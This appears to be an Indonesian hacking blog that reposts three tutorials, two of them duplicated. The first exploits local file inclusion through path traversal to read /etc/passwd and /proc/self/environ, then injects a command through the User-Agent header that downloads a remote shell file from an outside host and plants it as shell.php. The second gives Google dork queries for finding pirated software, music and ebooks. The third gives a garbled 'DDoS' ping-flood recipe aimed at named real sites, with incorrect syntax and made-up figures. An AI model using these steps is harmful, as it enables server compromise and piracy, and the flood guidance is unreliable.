Thumbs Up Tutorial Upload Shell Target LFI Dengan Tamper Data
Sebelum nya sorry klw udah ada threat yg sama seperti ini..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator telah mengijinkan..
ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: http://www.target.com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI ;)
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: http://www.target.com/index.php?page=../...etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd
contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
=[3]=Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: http://www.target.com/index.php?page=../...lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut :)
command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www.target.com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita ;)
This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.
Greats: JosS (hack0wn), h4cky0u.org , yogyacarderlink team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db
Saturday, 10 July 2010
google hack
Trik Dasar Melakukan Google Hacking Untuk Mendapatkan File Apapun Secara Gratis
Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////
Paman Google
Sepintas di dunia internet, banyak sekali kegiatan hacking lewat google untuk mendapatkan file tersembunyi. FIle - file tersebut seharusnya dirahasiakan dan tidak boleh disebarkan. Tetapi, melalui google hacking itu semua dengan mudah kita ambil. Memang Google satu satunya search engine top sejagad raya ! Disini, saya hanya akan membantu anda dengan cara - cara dasar untuk hacking google supaya mendapatkan file apapun secara gratis. Tidak cara yang susah susah, karena berbahaya bagi kanker, janin, kelamin, kehamilan dan lainnya. Nah, file apa saja yang bisa kamu dapatkan? contohnya adalah file video, music, ebook, film, dokumen, arsip zip dan masih banyak lainnya. INgat..ingat,,,hanya trik dasar saja ya ! Kalo mau yang profesional bisa dikembangkan sendiri atau berguru padaku. Baca selanjutnya…
Berikut cara caranya :
Googling E-Book.
+(”index of”) +(”/ebooks”|”/book”) +(chm|pdf|zip|rar) +apache
Adalah Query yang menghasilkan Index ebook di server yang berbasis
Apache
allinurl: +(rar|chm|zip|pdf|tgz|lit) judul buku
Ganti “judul buku” dengan buku yang ingin dicari. Jika ingin mencari
“Wiro Sableng”, ganti “judul buku” dengan Wiro Sableng. Cara ini
digunakan jika benar-benar mengetahui judul buku yang dicari.
Googling Warez.
“parent directory ” Xvid -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” MP3 -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” applications -xxx -html -htm -php -shtml -opendivx
-md5 -md5sums
“parent directory ” Gamez -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
“parent directory ” DVDRip -xxx -html -htm -php -shtml -opendivx -md5
-md5sums
Ganti Kata yang tebal dengan query.
Contoh, jika ingin mencari Limewire maka ganti “applications” dengan
Limewire. jika ingin mencari lagu dari Deep Purple berjudul Child In
Time, ganti “MP3? dengan Child in Time atau jika ingin mencari
lagu-lagu
Deep Purple tinggal ganti “MP3? dengan Deep Purple.
Googling MP3
?intitle:index.of? mp3
Cara lain untuk mencari MP3 di google adalah menggunakan Query ini.
Setelah MP3 kasih apa yang pengen dicari.
Contoh: Jika ingin mencari Led Zeppelin maka query-nya akan seperti ini
?intitle:index.of? mp3 led zeppelin
Googling file di megaupload
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:megaupload.com
Untuk mencari File musik ketik :
mp3|ogg|wma site:megaupload.com
Untuk mencari archive dan program ketik :
zip|rar|exe site:megaupload.com
Untuk mencari ebooks ketik :
pdf|rar|zip|doc|lit site:megaupload.com
Googling file di rapidshare.de
Untuk mencari File Video ketik :
avi|mpg|mpeg|wmv|rmvb site:rapidshare.de
Untuk mencari File musik ketik :
mp3|ogg|wma site:rapidshare.de
Untuk mencari archive dan program ketik :
zip|rar|exe site:rapidshare.de
Untuk mencari ebooks ketik :
pdf|doc|lit|rar|zip site:rapidshare.de
Untuk Googling di Megaupload dan rapidshare bisa langsung meletakkan apa
yang diinginkan di bagian pertama.
Contoh: Jika ingin mencari DA VINCI CODE ebook gunakan query ini
da vinci code pdf|doc|lit|rar|zip site:rapidshare.de
(ini jika kita benar-benar tahu judul bukunya.
DAN UNTUK GOOGLE HACKING LAINNYA :
1. Ketikkan URL atau kriteria pencarian setelah titik dua.
2. Jangan ada spasi antara perintah dan istilah.
//////////////////////////////////////////////////////////
”””””””””””””””””””””””””””””
Perintah ext: [Mencari file tipe tertentu.]
exp = “ext:doc”
”””””””””””””””””””””””””””””
Perintah related: [Menampilkan website dengan tema serupa.]
exp = “related:yahoo.com”
”””””””””””””””””””””””””””””
Perintah site: [Menampilkan sub-site.]
exp = “site:yahoo.com”
”””””””””””””””””””””””””””””
Perintah allinurl: [Menampilkan semua URL.]
exp = “allinurl:yahoo”
”””””””””””””””””””””””””””””
Perintah allintitle: [Menampilkan semua istilah baris judul.]
exp = “allintitle:yahoo.com”
”””””””””””””””””””””””””””””
Perintah define: [Menjelaskan istilah.]
exp = “define:virus”
”””””””””””””””””””””””””””””
Perintah link: [Menampilkan popularitas website.]
exp = “link:namahomepage”
”””””””””””””””””””””””””””””
Perintah filetype:torrent [Menampilkan file tipe tertentu.]
exp = “batman filetype:torrent”
”””””””””””””””””””””””””””””
Perintah movie: [Menampilkan info film.]
exp = “movie:batman”
”””””””””””””””””””””””””””””
Perintah daterange: [Menampilkan website yang baru diindeks.]
exp = “daterange:(2006-01-01)(2006-02-02)”
”””””””””””””””””””””””””””””
//////////////////////////////////////////////////////////
Sunday, 4 July 2010
penerangan pada kaskus by yogyafree
[Trick] Cara melakukan DDoS Attack
Nah, agan-agan yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).
Untuk lebih jelasnya, bisa anda baca dibawah ini :
Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).
Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.
Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.
Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.
Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.
Ditulis oleh template (Co-Admin KasKus dengan User ID 5)
nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.
berikut ini Dino berikan cara-caranya ( Singkat mode : On )
Penjelasan da DDoS
Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).
penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.
Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :
Ping -l ip-address/domain-target
sebagai contoh untuk domain target :
Ping -l www.google.co.id 100000
Contoh untuk domain IP address target :
Ping -l 216.239.61.104 100000
Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).
Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )
Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.
Coba anda perhatikan gambar, perintah ping dilakukan secara terus menerus oleh Dino pada www.kaskus.us
Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :
Ping -t -l ip-address/domain-target
Nah, agan-agan yang pernah atau sudah bergabung bersama KasKus sejak 2008, pastinya masih inget dong kalau kasKus pernah diserang ama yang satu ini, sehingga KasKus gak bisa diakses ( plus corupt ) yang dilakukan oleh oknum yogyaFree ( katanya ).
Untuk lebih jelasnya, bisa anda baca dibawah ini :
Penyerangan mengakibatkan thread-thread yang telah dibuat terpaksa dikunci (lock).
Pada tanggal 16—17 Mei 2008, Kaskus diserang menggunakan teknik DDoS (Distributed Denial of Service) oleh oknum yang diduga berasal dari komunitas YogyaFree. Serangan ini menyebabkan database Kaskus corrupt sehingga administrator terpaksa mengunci thread-thread yang ada.
Penyerangan tersebut diduga terkait dengan peristiwa perusakan (deface) situs YogyaFree beberapa hari sebelumnya. Penyerang yang mengklaim dirinya sebagai salah satu anggota Kaskus juga melontarkan celaan yang bernada mengejek di salah satu bagian forum YogyaFree. Hal tersebut membuat beberapa anggota YogyaFree berang, dan kemudian balik menyerang Kaskus dengan DDoS. Akibatnya, administrator Kaskus terpaksa mematikan server Kaskus.
Perang cyber antara kedua komunitas ini akhirnya selesai ketika kedua pengelola situs menandatangani memorandum online untuk menyudahkan pertikaian di antara keduanya. Pesan tersebut dipampang selama beberapa minggu di halaman situs masing-masing.
Meskipun kerusakan yang ditimbulkan oleh serangan ini cukup berat, administrator Kaskus menjanjikan bahwa Kaskus akan kembali normal pada bulan Juli 2008, seiring dengan diluncurkannya server baru Kaskus di gedung Cyber, Jakarta. Namun, ia juga mengatakan bahwa data-data yang akan dimunculkan kembali adalah data yang dimuat sebelum tahun 2008, sementara data yang dibuat selama tahun 2008 tidak dapat dimunculkan kembali.
Ditulis oleh template (Co-Admin KasKus dengan User ID 5)
nah, percaya atau nggak, hal ini bisa kita jalankan ( DDoS ) atau lakukan hanya dengan bermodalkan DOS ( sekarang disebut Comand Prompt atau CMD ) dan tanpa software-software yang harganya muaaahaaaaaal banget.
berikut ini Dino berikan cara-caranya ( Singkat mode : On )
Penjelasan da DDoS
Aksi Denial of Service adalah salah satu cara menghentikan atau mematikan sebuah service pada komputer atau server. Sebenarnya, teknik ini adalah teknik yang suaaaangat kuno sekali yang banyak dilakukan pada zaman purbakala. Namun, pada zaman sekarang, banyak sistem yang telah di Upgrade, maka, cara ini akan sangat susah sekali untuk dijalankan. saran saya, sebaliknya anda mencoba pada komputer atau website dalam sebuah jaringan dan diketahui spesifikasinya RENDAH (-an).
penambahan opsi l merupakan salah satu senjata Hacking yang digunakan dalam aktivitas hacking. Dengan huruf l (-l (el) ), maka, ukuran default buffer yang anda kirimkan adalah sebesar 32 bytes bisa diubah. dalam aksi hacking, apabila seseorang menggunakan nilai buffer yang sangat bueeesar sekali ( Seperti User YogyaFree ) tentu hal ini akan sangan berbahaya sekali, tentu hal ini akan sangat berbahaya pada komputer yang spesifikasinya rendah ( Seperti komputer pentium 2 ) terutama dalam sebuah jaringan. Efeknya akan langsung terlihat dan bekerja, yang berupa komputer atau website target bisa menjadi Hang.
Penulisannya adalah dengan mengetikan data ini didalam CMD atau DOS :
Ping -l ip-address/domain-target
sebagai contoh untuk domain target :
Ping -l www.google.co.id 100000
Contoh untuk domain IP address target :
Ping -l 216.239.61.104 100000
Proses ini akan mengirimkan data sebesar 100000 paket data ke target. Dimana hal ini lebih tinggi dibandingkan kapasitas TCP/IP Google yang hanya sebesar 90000 ( Contoh aja Gan ).
Perintah kedua yang digunakan dalam aksi DDoS ini adalah opsi -t. Penulisannya adalah : Ping -t ip-address/domain-target. ( Cara penggunaannya sama seperti -l )
Hal ini akan mengirimkan 32 bytes data ke target secara bertubi-tubi. Hal inilah yang menyebabkan komputer dengan spesifikasi Rendah akan menjadi hang atau Down. Pemberhentian ini hanya bisa dilakukan dengan menekan tombol Ctrl+C pada keyBoard anda.
Coba anda perhatikan gambar, perintah ping dilakukan secara terus menerus oleh Dino pada www.kaskus.us
Akan lebih parah lagi jika kedua opsi tersebut digabungkan menjadi satu :
Ping -t -l ip-address/domain-target
Subscribe to:
Posts (Atom)